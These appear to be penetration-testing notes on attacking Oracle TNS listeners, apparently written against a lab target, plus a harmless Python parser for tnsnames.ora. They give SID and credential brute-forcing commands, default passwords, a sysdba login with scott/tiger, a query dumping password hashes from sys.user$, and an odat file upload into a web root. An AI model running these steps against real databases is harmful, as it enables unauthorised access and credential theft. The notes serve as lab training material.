Oracle TNS

Port: TCP/1521

The TNS listener is configured to support various network protocols, including TCP/IP, UDP, IPX/SPX, and AppleTalk.

The configuration files for Oracle TNS are called tnsnames.ora and listener.ora and are typically located in the $ORACLE_HOME/network/admin directory.

Oracle 9 has a default password, CHANGE_ON_INSTALL, whereas Oracle 10 has no default password set.

The Oracle DBSNMP service also uses a default password, dbsnmp.

Each database or service has a unique entry in the tnsnames.ora file.

In Oracle RDBMS, a System Identifier (SID) is a unique name that identifies a particular database instance.

The SID is an essential part of the connection process, as it identifies the specific instance of the database the client wants to connect to.
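
To review which listener addresses and instance names a tnsnames.ora hands to clients, its entries can be parsed into an inventory. The Python below is an added example, not part of the original notes; the sample file, hostnames and helper names are constructed, and it assumes one alias per entry and unquoted values.

```python
import re

# Constructed sample tnsnames.ora; aliases and hosts are made up.
SAMPLE = """
# client-side alias file
XE =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = db01.example.internal)(PORT = 1521))
    (CONNECT_DATA = (SERVER = DEDICATED)(SID = XE)))
SALES =
  (DESCRIPTION =
    (ADDRESS_LIST =
      (ADDRESS = (PROTOCOL = TCP)(HOST = db02.example.internal)(PORT = 1522)))
    (CONNECT_DATA = (SERVICE_NAME = sales.example.internal)))
"""

TOKEN = re.compile(r"[()=]|[^()=\s]+")
FIELDS = ("HOST", "PORT", "SID", "SERVICE_NAME")

def _parse_group(tokens, pos):
    """Parse '(' KEY '=' (scalar | group...) ')' with tokens[pos] == '('."""
    key = tokens[pos + 1].upper()
    pos += 3  # skip '(', KEY, '='
    if tokens[pos] != "(":
        return (key, tokens[pos]), pos + 2  # scalar, then closing ')'
    children = []
    while tokens[pos] == "(":
        child, pos = _parse_group(tokens, pos)
        children.append(child)
    return (key, children), pos + 1  # step over closing ')'

def _find(node, key):
    """Yield each scalar stored under key anywhere below node."""
    name, value = node
    if isinstance(value, list):
        for child in value:
            yield from _find(child, key)
    elif name == key:
        yield value

def parse_tnsnames(text):
    """Map each alias to the hosts, ports, SIDs and service names it names."""
    tokens = TOKEN.findall(re.sub(r"#.*", "", text))  # drop '#' comments
    entries, pos = {}, 0
    while pos < len(tokens):
        alias = tokens[pos]  # ALIAS '=' '(' DESCRIPTION ...
        tree, pos = _parse_group(tokens, pos + 2)
        entries[alias] = {f.lower(): list(_find(tree, f)) for f in FIELDS}
    return entries
```

Calling parse_tnsnames(SAMPLE) returns one dictionary per alias, which makes it easy to see which entries still connect by SID rather than by service name and which ports each listener is expected on.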

There are various ways to enumerate, or better said, guess SIDs. For this we can use tools like nmap, hydra, odat, and others.

Tools

./odat.py -h

If not installed, see Pentesting Machine

Nmap - SID Bruteforcing

sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute

ODAT - More information, user bruteforcing included

./odat.py all -s 10.129.204.235

SQLplus - Log In

sqlplus <username>/<password>@<IP>/<SID>

If sqlplus fails with the error

sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory

execute:

sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf"; sudo ldconfig

SQLplus commands:

select table_name from all_tables;
select * from user_role_privs;

Database Enumeration

It is possible to try known credentials to log in as the System Database Admin (sysdba):

sqlplus scott/tiger@10.129.204.235/XE as sysdba

Then list the current user's privileges:

select * from user_role_privs;

From this point, we could retrieve the password hashes from sys.user$ and try to crack them offline:

select name, password from sys.user$;

Oracle RDBMS - File Upload

echo "Oracle File Upload Test" > testing.txt
./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
curl -X GET http://10.129.204.235/testing.txt
